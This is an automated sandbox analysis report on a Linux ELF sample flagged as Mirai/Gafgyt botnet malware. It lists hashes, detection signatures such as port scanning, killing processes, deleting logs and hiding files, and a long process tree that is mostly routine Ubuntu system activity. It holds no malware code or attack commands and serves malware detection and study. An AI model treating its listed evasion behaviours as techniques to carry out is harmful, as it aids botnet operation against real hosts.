Linux Analysis Report 01oHMcUgUM

Overview

General Information

Sample Name: 01oHMcUgUM
Analysis ID: 553470
MD5: 14c3173a21e8dd262999e2ab8c2833f4
SHA1: efc2c18ac9a0f9dab71930037496cc676fa18bea
SHA256: dec1840b49d9d7303369f1ce3efec379e86bd7095a4a2630b2c3df18ab1a12f4
Tags: 32, elf, mirai, renesas
Infos:

Detection

Gafgyt Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample has stripped symbol table
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553470
Start date: 15.01.2022
Start time: 00:13:48
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 36s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 01oHMcUgUM
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal100.spre.troj.lin@0/200@12/0
Warnings:
  • Connection to analysis system has been lost, crash info: Unknown
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.

Process Tree

  • system is lnxubuntu20
  • systemd New Fork (PID: 5192, Parent: 1)
  • logrotate (PID: 5192, Parent: 1, MD5: ff9f6831debb63e53a31ff8057143af6) Arguments: /usr/sbin/logrotate /etc/logrotate.conf
    • gzip (PID: 5233, Parent: 5192, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5234, Parent: 5192, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "
      • sh New Fork (PID: 5235, Parent: 5234)
      • invoke-rc.d (PID: 5235, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: invoke-rc.d --quiet cups restart
        • runlevel (PID: 5236, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /sbin/runlevel
        • systemctl (PID: 5239, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-enabled cups.service
        • ls (PID: 5242, Parent: 5235, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls /etc/rc[S2345].d/S[0-9][0-9]cups
        • systemctl (PID: 5243, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active cups.service
    • gzip (PID: 5244, Parent: 5192, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5245, Parent: 5192, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
      • sh New Fork (PID: 5246, Parent: 5245)
      • rsyslog-rotate (PID: 5246, Parent: 5245, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/lib/rsyslog/rsyslog-rotate
        • systemctl (PID: 5247, Parent: 5246, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl kill -s HUP rsyslog.service
  • systemd New Fork (PID: 5193, Parent: 1)
  • install (PID: 5193, Parent: 1, MD5: 55e2520049dc6a62e8c94732e36cdd54) Arguments: /usr/bin/install -d -o man -g man -m 0755 /var/cache/man
  • systemd New Fork (PID: 5232, Parent: 1)
  • find (PID: 5232, Parent: 1, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: /usr/bin/find /var/cache/man -type f -name *.gz -atime +6 -delete
  • systemd New Fork (PID: 5241, Parent: 1)
  • mandb (PID: 5241, Parent: 1, MD5: 1dda5ea0027ecf1c2db0f5a3de7e6941) Arguments: /usr/bin/mandb --quiet
  • 01oHMcUgUM (PID: 5263, Parent: 5117, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/01oHMcUgUM
  • systemd New Fork (PID: 5289, Parent: 1)
  • journalctl (PID: 5289, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5305, Parent: 1)
  • systemd-journald (PID: 5305, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5308, Parent: 1)
  • journalctl (PID: 5308, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5360, Parent: 1)
  • dbus-daemon (PID: 5360, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5370, Parent: 1)
  • whoopsie (PID: 5370, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5372, Parent: 1860)
  • pulseaudio (PID: 5372, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5377, Parent: 1)
  • systemd-logind (PID: 5377, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5386, Parent: 1)
  • rtkit-daemon (PID: 5386, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5440, Parent: 1)
  • polkitd (PID: 5440, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5448, Parent: 1)
  • rsyslogd (PID: 5448, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5449, Parent: 1)
  • agetty (PID: 5449, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • gdm3 New Fork (PID: 5450, Parent: 1320)
  • Default (PID: 5450, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5451, Parent: 1320)
  • Default (PID: 5451, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5452, Parent: 1320)
  • Default (PID: 5452, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5456, Parent: 1)
  • gpu-manager (PID: 5456, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5457, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5458, Parent: 5457)
      • grep (PID: 5458, Parent: 5457, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5459, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5460, Parent: 5459)
      • grep (PID: 5460, Parent: 5459, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5461, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5462, Parent: 5461)
      • grep (PID: 5462, Parent: 5461, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5463, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5464, Parent: 5463)
      • grep (PID: 5464, Parent: 5463, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5465, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5466, Parent: 5465)
      • grep (PID: 5466, Parent: 5465, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5467, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5468, Parent: 5467)
      • grep (PID: 5468, Parent: 5467, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5472, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5473, Parent: 5472)
      • grep (PID: 5473, Parent: 5472, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5474, Parent: 5456, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5476, Parent: 5474)
      • grep (PID: 5476, Parent: 5474, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5478, Parent: 1)
  • generate-config (PID: 5478, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5494, Parent: 5478, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5495, Parent: 1)
  • gdm-wait-for-drm (PID: 5495, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5500, Parent: 1)
  • gdm3 (PID: 5500, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5505, Parent: 5500)
    • plymouth (PID: 5505, Parent: 5500, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 5523, Parent: 5500)
    • gdm-session-worker (PID: 5523, Parent: 5500, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
      • gdm-wayland-session (PID: 5527, Parent: 5523, MD5: d3def63cf1e83f7fb8a0f13b1744ff7c) Arguments: /usr/lib/gdm3/gdm-wayland-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
        • dbus-daemon (PID: 5531, Parent: 5527, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 3 --session
          • dbus-daemon New Fork (PID: 5533, Parent: 5531)
            • false (PID: 5534, Parent: 5533, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
        • dbus-run-session (PID: 5535, Parent: 5527, MD5: 245f3ef6a268850b33b0225a8753b7f4) Arguments: dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart
          • dbus-daemon (PID: 5536, Parent: 5535, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --nofork --print-address 4 --session
    • gdm3 New Fork (PID: 5537, Parent: 5500)
    • Default (PID: 5537, Parent: 5500, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 5538, Parent: 5500)
    • Default (PID: 5538, Parent: 5500, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5506, Parent: 1)
  • accounts-daemon (PID: 5506, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5518, Parent: 5506, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5519, Parent: 5518, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5520, Parent: 5519, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5521, Parent: 5520)
          • locale (PID: 5521, Parent: 5520, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5522, Parent: 5520)
          • grep (PID: 5522, Parent: 5520, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • fusermount (PID: 5545, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5567, Parent: 1)
  • journalctl (PID: 5567, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5568, Parent: 1)
  • systemd-journald (PID: 5568, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5569, Parent: 1)
  • dbus-daemon (PID: 5569, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5570, Parent: 1)
  • whoopsie (PID: 5570, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5575, Parent: 1)
  • systemd-logind (PID: 5575, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5635, Parent: 1860)
  • pulseaudio (PID: 5635, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5636, Parent: 1)
  • gpu-manager (PID: 5636, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5637, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5638, Parent: 5637)
      • grep (PID: 5638, Parent: 5637, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5641, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5642, Parent: 5641)
      • grep (PID: 5642, Parent: 5641, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5646, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5647, Parent: 5646)
      • grep (PID: 5647, Parent: 5646, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5651, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5652, Parent: 5651)
      • grep (PID: 5652, Parent: 5651, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5653, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5654, Parent: 5653)
      • grep (PID: 5654, Parent: 5653, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5659, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5660, Parent: 5659)
      • grep (PID: 5660, Parent: 5659, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5664, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5665, Parent: 5664)
      • grep (PID: 5665, Parent: 5664, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5667, Parent: 5636, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5668, Parent: 5667)
      • grep (PID: 5668, Parent: 5667, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5640, Parent: 1)
  • rtkit-daemon (PID: 5640, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5645, Parent: 1)
  • polkitd (PID: 5645, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5655, Parent: 1)
  • rsyslogd (PID: 5655, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5658, Parent: 1)
  • agetty (PID: 5658, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5666, Parent: 1)
  • journalctl (PID: 5666, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5671, Parent: 1)
  • journalctl (PID: 5671, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5672, Parent: 1)
  • systemd-journald (PID: 5672, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5674, Parent: 1)
  • generate-config (PID: 5674, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5675, Parent: 5674, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5679, Parent: 1860)
  • dbus-daemon (PID: 5679, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5680, Parent: 1)
  • gdm-wait-for-drm (PID: 5680, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5681, Parent: 1)
  • whoopsie (PID: 5681, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5683, Parent: 1)
  • dbus-daemon (PID: 5683, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5688, Parent: 1)
  • systemd-logind (PID: 5688, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5746, Parent: 1)
  • journalctl (PID: 5746, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5747, Parent: 1860)
  • pulseaudio (PID: 5747, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5752, Parent: 1)
  • rtkit-daemon (PID: 5752, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5756, Parent: 1)
  • polkitd (PID: 5756, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5760, Parent: 1)
  • rsyslogd (PID: 5760, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
